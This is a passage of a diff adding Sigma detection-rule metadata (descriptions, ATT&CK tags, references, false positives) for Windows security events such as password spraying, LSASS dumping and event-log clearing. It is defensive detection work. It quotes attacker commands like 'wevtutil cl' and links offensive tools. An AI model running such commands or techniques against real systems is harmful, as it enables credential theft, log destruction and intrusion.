"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_service_installation_by_unusal_client.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1543" + ], + "creation_date": "2022/09/15", + "filename": "win_security_service_installation_by_unusal_client.yml", + "author": "Tim Rauch", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "security", + "logsource.product": "windows" + } + }, + { + "description": "Look for non-system accounts SMB accessing a file with write (0x2) access mask via administrative share (i.e C$).", + "uuid": "b210394c-ba12-4f89-9117-44a2464b9511", + "value": "SMB Create Remote File Admin Share", + "meta": { + "refs": [ + "https://github.com/OTRF/ThreatHunter-Playbook/blob/f7a58156dbfc9b019f17f638b8c62d22e557d350/playbooks/WIN-201012004336.yaml", + "https://securitydatasets.com/notebooks/small/windows/08_lateral_movement/SDWIN-200806015757.html?highlight=create%20file", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_smb_file_creation_admin_shares.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1021.002" + ], + "creation_date": "2020/08/06", + "filename": "win_security_smb_file_creation_admin_shares.yml", + "author": "Jose Rodriguez (@Cyb3rPandaH), OTR (Open Threat Research)", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Addition of domains is seldom and should be verified for legitimacy.", + "uuid": "0255a820-e564-4e40-af2b-6ac61160335c", + "value": "Addition of Domain Trusts", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_add_domain_trust.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1098" + ], + "creation_date": "2019/12/03", + "filename": "win_security_susp_add_domain_trust.yml", + "author": 
"Thomas Patzke", + "level": "medium", + "falsepositive": [ + "Legitimate extension of domain structure" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "An attacker can use the SID history attribute to gain additional privileges.", + "uuid": "2632954e-db1c-49cb-9936-67d1ef1d17d2", + "value": "Addition of SID History to Active Directory Object", + "meta": { + "refs": [ + "https://adsecurity.org/?p=1772", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_add_sid_history.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.t1134.005" + ], + "creation_date": "2017/02/19", + "filename": "win_security_susp_add_sid_history.yml", + "author": "Thomas Patzke, @atc_project (improvements)", + "level": "medium", + "falsepositive": [ + "Migration of an account into a new domain" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Code integrity failures may indicate tampered executables.", + "uuid": "470ec5fa-7b4e-4071-b200-4c753100f49b", + "value": "Failed Code Integrity Checks", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_codeintegrity_check_failure.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027.001" + ], + "creation_date": "2019/12/03", + "filename": "win_security_susp_codeintegrity_check_failure.yml", + "author": "Thomas Patzke", + "level": "low", + "falsepositive": [ + "Disk device errors" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious computer name samtheadmin-{1..100}$ generated by hacktool", + "uuid": "39698b3f-da92-4bc6-bfb5-645a98386e45", + "value": "Win Susp Computer Name Containing Samtheadmin", + "meta": { + "refs": [ + 
"https://twitter.com/malmoeb/status/1511760068743766026", + "https://github.com/WazeHell/sam-theadmin/blob/main/sam_the_admin.py", + "https://github.com/helloexp/0day/blob/614227a7b9beb0e91e7e2c6a5e532e6f7a8e883c/00-CVE_EXP/CVE-2021-42287/sam-the-admin/sam_the_admin.py", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_computer_name.yml" + ], + "tags": [ + "cve.2021.42278", + "cve.2021.42287", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1078" + ], + "creation_date": "2022/09/09", + "filename": "win_security_susp_computer_name.yml", + "author": "elhoim", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "security", + "logsource.product": "windows" + } + }, + { + "description": "The Directory Service Restore Mode (DSRM) account is a local administrator account on Domain Controllers. Attackers may change the password to gain persistence.", + "uuid": "53ad8e36-f573-46bf-97e4-15ba5bf4bb51", + "value": "Password Change on Directory Service Restore Mode (DSRM) Account", + "meta": { + "refs": [ + "https://adsecurity.org/?p=1714", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_dsrm_password_change.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1098" + ], + "creation_date": "2017/02/19", + "filename": "win_security_susp_dsrm_password_change.yml", + "author": "Thomas Patzke", + "level": "high", + "falsepositive": [ + "Initial installation of a domain controller" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "One of the Windows Eventlogs has been cleared. e.g. 
caused by \"wevtutil cl\" command execution", + "uuid": "d99b79d2-0a6f-4f46-ad8b-260b6e17f982", + "value": "Security Eventlog Cleared", + "meta": { + "refs": [ + "https://twitter.com/deviouspolack/status/832535435960209408", + "https://www.hybrid-analysis.com/sample/027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745?environmentId=100", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_eventlog_cleared.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.001", + "car.2016-04-002" + ], + "creation_date": "2017/01/10", + "filename": "win_security_susp_eventlog_cleared.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog)", + "System provisioning (system reset before the golden image creation)" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects a source user failing to authenticate with multiple users using explicit credentials on a host.", + "uuid": "196a29c2-e378-48d8-ba07-8a9e61f7fab9", + "value": "Multiple Users Attempting To Authenticate Using Explicit Credentials", + "meta": { + "refs": [ + "https://docs.splunk.com/Documentation/ESSOC/3.22.0/stories/UseCase#Active_directory_password_spraying", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_failed_logons_explicit_credentials.yml" + ], + "tags": [ + "attack.t1110.003", + "attack.initial_access", + "attack.privilege_escalation" + ], + "creation_date": "2021/06/01", + "filename": "win_security_susp_failed_logons_explicit_credentials.yml", + "author": "Mauricio Velazco", + "level": "medium", + "falsepositive": [ + "Terminal servers", + "Jump servers", + "Other multiuser systems like Citrix server farms", + "Workstations with frequently changing users" + ], + "logsource.category": "No established 
category", + "logsource.product": "windows" + } + }, + { + "description": "Detects failed logins with multiple accounts from a single process on the system.", + "uuid": "fe563ab6-ded4-4916-b49f-a3a8445fe280", + "value": "Multiple Users Failing to Authenticate from Single Process", + "meta": { + "refs": [ + "https://docs.splunk.com/Documentation/ESSOC/3.22.0/stories/UseCase#Active_directory_password_spraying", + "https://www.trimarcsecurity.com/single-post/2018/05/06/trimarc-research-detecting-password-spraying-with-security-event-auditing", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_failed_logons_single_process.yml" + ], + "tags": [ + "attack.t1110.003", + "attack.initial_access", + "attack.privilege_escalation" + ], + "creation_date": "2021/06/01", + "filename": "win_security_susp_failed_logons_single_process.yml", + "author": "Mauricio Velazco", + "level": "medium", + "falsepositive": [ + "Terminal servers", + "Jump servers", + "Other multiuser systems like Citrix server farms", + "Workstations with frequently changing users" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious failed logins with different user accounts from a single source system", + "uuid": "e98374a6-e2d9-4076-9b5c-11bdb2569995", + "value": "Failed Logins with Different Accounts from Single Source System", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_failed_logons_single_source.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.t1078" + ], + "creation_date": "2017/01/10", + "filename": "win_security_susp_failed_logons_single_source.yml", + "author": "Florian Roth", + "level": "medium", + "falsepositive": [ + "Terminal servers", + "Jump servers", + "Other multiuser systems like Citrix server farms", + "Workstations with frequently changing users" 
+ ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious failed logins with different user accounts from a single source system", + "uuid": "6309ffc4-8fa2-47cf-96b8-a2f72e58e538", + "value": "Failed NTLM Logins with Different Accounts from Single Source System", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_failed_logons_single_source2.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.t1078" + ], + "creation_date": "2017/01/10", + "filename": "win_security_susp_failed_logons_single_source2.yml", + "author": "Florian Roth", + "level": "medium", + "falsepositive": [ + "Terminal servers", + "Jump servers", + "Other multiuser systems like Citrix server farms", + "Workstations with frequently changing users" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects multiple failed logins with multiple valid domain accounts from a single source system using the Kerberos protocol.", + "uuid": "5d1d946e-32e6-4d9a-a0dc-0ac022c7eb98", + "value": "Valid Users Failing to Authenticate From Single Source Using Kerberos", + "meta": { + "refs": [ + "https://docs.splunk.com/Documentation/ESSOC/3.22.0/stories/UseCase#Active_directory_password_spraying", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_failed_logons_single_source_kerberos.yml" + ], + "tags": [ + "attack.t1110.003", + "attack.initial_access", + "attack.privilege_escalation" + ], + "creation_date": "2021/06/01", + "filename": "win_security_susp_failed_logons_single_source_kerberos.yml", + "author": "Mauricio Velazco, frack113", + "level": "medium", + "falsepositive": [ + "Vulnerability scanners", + "Misconfigured systems", + "Remote administration tools", + "VPN terminators", + "Multiuser systems like Citrix 
server farms" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects failed logins with multiple disabled domain accounts from a single source system using the Kerberos protocol.", + "uuid": "4b6fe998-b69c-46d8-901b-13677c9fb663", + "value": "Disabled Users Failing To Authenticate From Source Using Kerberos", + "meta": { + "refs": [ + "https://docs.splunk.com/Documentation/ESSOC/3.22.0/stories/UseCase#Active_directory_password_spraying", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_failed_logons_single_source_kerberos2.yml" + ], + "tags": [ + "attack.t1110.003", + "attack.initial_access", + "attack.privilege_escalation" + ], + "creation_date": "2021/06/01", + "filename": "win_security_susp_failed_logons_single_source_kerberos2.yml", + "author": "Mauricio Velazco, frack113", + "level": "medium", + "falsepositive": [ + "Vulnerability scanners", + "Misconfigured systems", + "Remote administration tools", + "VPN terminators", + "Multiuser systems like Citrix server farms" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects failed logins with multiple invalid domain accounts from a single source system using the Kerberos protocol.", + "uuid": "bc93dfe6-8242-411e-a2dd-d16fa0cc8564", + "value": "Invalid Users Failing To Authenticate From Source Using Kerberos", + "meta": { + "refs": [ + "https://docs.splunk.com/Documentation/ESSOC/3.22.0/stories/UseCase#Active_directory_password_spraying", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_failed_logons_single_source_kerberos3.yml" + ], + "tags": [ + "attack.t1110.003", + "attack.initial_access", + "attack.privilege_escalation" + ], + "creation_date": "2021/06/01", + "filename": "win_security_susp_failed_logons_single_source_kerberos3.yml", + "author": "Mauricio Velazco, 
frack113", + "level": "medium", + "falsepositive": [ + "Vulnerability scanners", + "Misconfigured systems", + "Remote administration tools", + "VPN terminators", + "Multiuser systems like Citrix server farms" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects failed logins with multiple valid domain accounts from a single source system using the NTLM protocol.", + "uuid": "f88bab7f-b1f4-41bb-bdb1-4b8af35b0470", + "value": "Valid Users Failing to Authenticate from Single Source Using NTLM", + "meta": { + "refs": [ + "https://docs.splunk.com/Documentation/ESSOC/3.22.0/stories/UseCase#Active_directory_password_spraying", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_failed_logons_single_source_ntlm.yml" + ], + "tags": [ + "attack.t1110.003", + "attack.initial_access", + "attack.privilege_escalation" + ], + "creation_date": "2021/06/01", + "filename": "win_security_susp_failed_logons_single_source_ntlm.yml", + "author": "Mauricio Velazco", + "level": "medium", + "falsepositive": [ + "Terminal servers", + "Jump servers", + "Other multiuser systems like Citrix server farms", + "Workstations with frequently changing users" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects failed logins with multiple invalid domain accounts from a single source system using the NTLM protocol.", + "uuid": "56d62ef8-3462-4890-9859-7b41e541f8d5", + "value": "Invalid Users Failing To Authenticate From Single Source Using NTLM", + "meta": { + "refs": [ + "https://docs.splunk.com/Documentation/ESSOC/3.22.0/stories/UseCase#Active_directory_password_spraying", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_failed_logons_single_source_ntlm2.yml" + ], + "tags": [ + "attack.t1110.003", + "attack.initial_access", + "attack.privilege_escalation" + ], 
+ "creation_date": "2021/06/01", + "filename": "win_security_susp_failed_logons_single_source_ntlm2.yml", + "author": "Mauricio Velazco", + "level": "medium", + "falsepositive": [ + "Terminal servers", + "Jump servers", + "Other multiuser systems like Citrix server farms", + "Workstations with frequently changing users" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "This method uses uncommon error codes on failed logons to determine suspicious activity and tampering with accounts that have been disabled or somehow restricted.", + "uuid": "9eb99343-d336-4020-a3cd-67f3819e68ee", + "value": "Account Tampering - Suspicious Failed Logon Reasons", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4625", + "https://twitter.com/SBousseaden/status/1101431884540710913", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_failed_logon_reasons.yml" + ], + "tags": [ + "attack.persistence", + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.initial_access", + "attack.t1078" + ], + "creation_date": "2017/02/19", + "filename": "win_security_susp_failed_logon_reasons.yml", + "author": "Florian Roth", + "level": "medium", + "falsepositive": [ + "User using a disabled account" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "A login from a public IP can indicate a misconfigured firewall or network boundary.", + "uuid": "f88e112a-21aa-44bd-9b01-6ee2a2bbbed1", + "value": "Failed Logon From Public IP", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_failed_logon_source.yml" + ], + "tags": [ + "attack.initial_access", + "attack.persistence", + "attack.t1078", + "attack.t1190", + "attack.t1133" + ], + "creation_date": "2020/05/06", + "filename": 
"win_security_susp_failed_logon_source.yml", + "author": "NVISO", + "level": "medium", + "falsepositive": [ + "Legitimate logon attempts over the internet", + "IPv4-to-IPv6 mapped IPs" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects a source system failing to authenticate against a remote host with multiple users.", + "uuid": "add2ef8d-dc91-4002-9e7e-f2702369f53a", + "value": "Multiple Users Remotely Failing To Authenticate From Single Source", + "meta": { + "refs": [ + "https://docs.splunk.com/Documentation/ESSOC/3.22.0/stories/UseCase#Active_directory_password_spraying", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_failed_remote_logons_single_source.yml" + ], + "tags": [ + "attack.t1110.003", + "attack.initial_access", + "attack.privilege_escalation" + ], + "creation_date": "2021/06/01", + "filename": "win_security_susp_failed_remote_logons_single_source.yml", + "author": "Mauricio Velazco", + "level": "medium", + "falsepositive": [ + "Terminal servers", + "Jump servers", + "Other multiuser systems like Citrix server farms", + "Workstations with frequently changing users" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "This method triggers on rare Kerberos Failure Codes caused by manipulations of Kerberos messages", + "uuid": "f7644214-0eb0-4ace-9455-331ec4c09253", + "value": "Kerberos Manipulation", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_kerberos_manipulation.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1212" + ], + "creation_date": "2017/02/10", + "filename": "win_security_susp_kerberos_manipulation.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Faulty legacy applications" + ], + "logsource.category": "No established category", + 
"logsource.product": "windows" + } + }, + { + "description": "Detects logon events that have characteristics of events generated during an attack with KrbRelayUp and the like", + "uuid": "749c9f5e-b353-4b90-a9c1-05243357ca4b", + "value": "KrbRelayUp Attack Pattern", + "meta": { + "refs": [ + "https://twitter.com/sbousseaden/status/1518976397364056071?s=12&t=qKO5eKHvWhAP19a50FTZ7g", + "https://github.com/elastic/detection-rules/blob/fb6ee2c69864ffdfe347bf3b050cb931f53067a6/rules/windows/privilege_escalation_krbrelayup_suspicious_logon.toml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_krbrelayup.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.credential_access" + ], + "creation_date": "2022/04/27", + "filename": "win_security_susp_krbrelayup.yml", + "author": "@SBousseaden, Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects the usage of particular AttributeLDAPDisplayNames, which are known for data exchange via LDAP by the tool LDAPFragger and are additionally not commonly used in companies.", + "uuid": "d00a9a72-2c09-4459-ad03-5e0a23351e36", + "value": "Suspicious LDAP-Attributes Used", + "meta": { + "refs": [ + "https://medium.com/@ivecodoe/detecting-ldapfragger-a-newly-released-cobalt-strike-beacon-using-ldap-for-c2-communication-c274a7f00961", + "https://blog.fox-it.com/2020/03/19/ldapfragger-command-and-control-over-ldap-attributes/", + "https://github.com/fox-it/LDAPFragger", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_ldap_dataexchange.yml" + ], + "tags": [ + "attack.t1001.003", + "attack.command_and_control" + ], + "creation_date": "2019/03/24", + "filename": "win_security_susp_ldap_dataexchange.yml", + "author": "xknow @xknow_infosec", + "level": "high", + "falsepositive": [ + "Companies, who 
may use these default LDAP-Attributes for personal information" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects the creation of suspicious accounts similar to ANONYMOUS LOGON, such as using additional spaces. Created as an covering detection for exclusion of Logon Type 3 from ANONYMOUS LOGON accounts.", + "uuid": "1bbf25b9-8038-4154-a50b-118f2a32be27", + "value": "Suspicious Windows ANONYMOUS LOGON Local Account Created", + "meta": { + "refs": [ + "https://twitter.com/SBousseaden/status/1189469425482829824", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_local_anon_logon_created.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1136.001", + "attack.t1136.002" + ], + "creation_date": "2019/10/31", + "filename": "win_security_susp_local_anon_logon_created.yml", + "author": "James Pemberton / @4A616D6573", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious processes logging on with explicit credentials", + "uuid": "941e5c45-cda7-4864-8cea-bbb7458d194a", + "value": "Suspicious Remote Logon with Explicit Credentials", + "meta": { + "refs": [ + "https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_logon_explicit_credentials.yml" + ], + "tags": [ + "attack.t1078", + "attack.lateral_movement" + ], + "creation_date": "2020/10/05", + "filename": "win_security_susp_logon_explicit_credentials.yml", + "author": "oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, Tim Shelton", + "level": "medium", + "falsepositive": [ + "Administrators that use the RunAS command or scheduled tasks" + ], + "logsource.category": "No established category", + "logsource.product": 
"windows" + } + }, + { + "description": "Detects logon events that specify new credentials", + "uuid": "def8b624-e08f-4ae1-8612-1ba21190da6b", + "value": "Outgoing Logon with New Credentials", + "meta": { + "refs": [ + "https://go.recordedfuture.com/hubfs/reports/mtp-2021-0914.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_logon_newcredentials.yml" + ], + "tags": "No established tags", + "creation_date": "2022/04/06", + "filename": "win_security_susp_logon_newcredentials.yml", + "author": "Max Altgelt", + "level": "low", + "falsepositive": [ + "Legitimate remote administration activity" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects process handle on LSASS process with certain access mask and object type SAM_DOMAIN", + "uuid": "aa1697b7-d611-4f9a-9cb2-5125b4ccfd5c", + "value": "Password Dumper Activity on LSASS", + "meta": { + "refs": [ + "https://twitter.com/jackcr/status/807385668833968128", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_lsass_dump.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ], + "creation_date": "2017/02/12", + "filename": "win_security_susp_lsass_dump.yml", + "author": "sigma", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects process handle on LSASS process with certain access mask", + "uuid": "4a1b6da0-d94f-4fc3-98fc-2d9cb9e5ee76", + "value": "Generic Password Dumper Activity on LSASS", + "meta": { + "refs": [ + "https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html", + "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_lsass_dump_generic.yml" + ], + "tags": [ + "attack.credential_access", + "car.2019-04-004", + "attack.t1003.001" + ], + "creation_date": "2019/11/01", + "filename": "win_security_susp_lsass_dump_generic.yml", + "author": "Roberto Rodriguez, Teymur Kheirkhabarov, Dimitrios Slamaris, Mark Russinovich, Aleksey Potapov, oscd.community (update)", + "level": "high", + "falsepositive": [ + "Legitimate software accessing LSASS process for legitimate reason; update the whitelist with it" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects multiple file rename or delete events occurrence within a specified period of time by a same user (these events may signalize about ransomware activity).", + "uuid": "97919310-06a7-482c-9639-92b67ed63cf8", + "value": "Suspicious Multiple File Rename Or Delete Occurred", + "meta": { + "refs": [ + "https://www.manageengine.com/data-security/how-to/how-to-detect-ransomware-attacks.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_multiple_files_renamed_or_deleted.yml" + ], + "tags": [ + "attack.impact", + "attack.t1486" + ], + "creation_date": "2020/10/16", + "filename": "win_security_susp_multiple_files_renamed_or_deleted.yml", + "author": "Vasiliy Burov, oscd.community", + "level": "medium", + "falsepositive": [ + "Software uninstallation", + "Files restore activities" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects activity as \"net user administrator /domain\" and \"net group domain admins /domain\"", + "uuid": "968eef52-9cff-4454-8992-1e74b9cbad6c", + "value": "Reconnaissance Activity", + "meta": { + "refs": [ + "https://findingbad.blogspot.de/2017/01/hunting-what-does-it-look-like.html", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_net_recon_activity.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1087.002", + "attack.t1069.002", + "attack.s0039" + ], + "creation_date": "2017/03/07", + "filename": "win_security_susp_net_recon_activity.yml", + "author": "Florian Roth (rule), Jack Croock (method), Jonhnathan Ribeiro (improvements), oscd.community", + "level": "high", + "falsepositive": [ + "Administrator activity" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects the extraction of password protected ZIP archives. See the filename variable for more details on which file has been opened.", + "uuid": "00ba9da1-b510-4f6b-b258-8d338836180f", + "value": "Password Protected ZIP File Opened", + "meta": { + "refs": [ + "https://twitter.com/sbousseaden/status/1523383197513379841", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_opened_encrypted_zip.yml" + ], + "tags": "No established tags", + "creation_date": "2022/05/09", + "filename": "win_security_susp_opened_encrypted_zip.yml", + "author": "Florian Roth", + "level": "medium", + "falsepositive": [ + "Legitimate used of encrypted ZIP files" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects the extraction of password protected ZIP archives with suspicious file names. 
See the filename variable for more details on which file has been opened.", + "uuid": "54f0434b-726f-48a1-b2aa-067df14516e4", + "value": "Password Protected ZIP File Opened (Suspicious Filenames)", + "meta": { + "refs": [ + "https://twitter.com/sbousseaden/status/1523383197513379841", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_opened_encrypted_zip_filename.yml" + ], + "tags": "No established tags", + "creation_date": "2022/05/09", + "filename": "win_security_susp_opened_encrypted_zip_filename.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Legitimate used of encrypted ZIP files" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects the extraction of password protected ZIP archives. See the filename variable for more details on which file has been opened.", + "uuid": "571498c8-908e-40b4-910b-d2369159a3da", + "value": "Password Protected ZIP File Opened (Email Attachment)", + "meta": { + "refs": [ + "https://twitter.com/sbousseaden/status/1523383197513379841", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_opened_encrypted_zip_outlook.yml" + ], + "tags": "No established tags", + "creation_date": "2022/05/09", + "filename": "win_security_susp_opened_encrypted_zip_outlook.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Legitimate used of encrypted ZIP files" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious outbound network activity via kerberos default port indicating possible lateral movement or first stage PrivEsc via delegation.", + "uuid": "eca91c7c-9214-47b9-b4c5-cb1d7e4f2350", + "value": "Suspicious Outbound Kerberos Connection - Security", + "meta": { + "refs": [ + "https://github.com/GhostPack/Rubeus", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_outbound_kerberos_connection.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1558.003" + ], + "creation_date": "2019/10/24", + "filename": "win_security_susp_outbound_kerberos_connection.yml", + "author": "Ilyas Ochkov, oscd.community", + "level": "high", + "falsepositive": [ + "Other browsers" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects possible addition of shadow credentials to an active directory object.", + "uuid": "f598ea0c-c25a-4f72-a219-50c44411c791", + "value": "Possible Shadow Credentials Added", + "meta": { + "refs": [ + "https://www.elastic.co/guide/en/security/8.4/potential-shadow-credentials-added-to-ad-object.html", + "https://cyberstoph.org/posts/2022/03/detecting-shadow-credentials/", + "https://twitter.com/SBousseaden/status/1581300963650187264?", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_possible_shadow_credentials_added.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1556" + ], + "creation_date": "2022/10/17", + "filename": "win_security_susp_possible_shadow_credentials_added.yml", + "author": "Nasreddine Bencherchali (rule), Elastic (idea)", + "level": "high", + "falsepositive": [ + "Modifications in the msDS-KeyCredentialLink attribute can be done legitimately by the Azure AD Connect synchronization account or the ADFS service account. These accounts can be added as Exceptions. 
(From elastic FP section)" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "detects execution of psexec or paexec with renamed service name, this rule helps to filter out the noise if psexec is used for legit purposes or if attacker uses a different psexec client other than sysinternal one", + "uuid": "c462f537-a1e3-41a6-b5fc-b2c2cef9bf82", + "value": "Suspicious PsExec Execution", + "meta": { + "refs": [ + "https://blog.menasec.net/2019/02/threat-hunting-3-detecting-psexec.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_psexec.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1021.002" + ], + "creation_date": "2019/04/03", + "filename": "win_security_susp_psexec.yml", + "author": "Samir Bousseaden", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects known sensitive file extensions accessed on a network share", + "uuid": "91c945bc-2ad1-4799-a591-4d00198a1215", + "value": "Suspicious Access to Sensitive File Extensions", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_raccess_sensitive_fext.yml" + ], + "tags": [ + "attack.collection", + "attack.t1039" + ], + "creation_date": "2019/04/03", + "filename": "win_security_susp_raccess_sensitive_fext.yml", + "author": "Samir Bousseaden", + "level": "medium", + "falsepositive": [ + "Help Desk operator doing backup or re-imaging end user machine or backup software", + "Users working with these data types or exchanging message files" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects service ticket requests using RC4 encryption type", + "uuid": "496a0e47-0a33-4dca-b009-9e6ca3591f39", + "value": "Suspicious Kerberos 
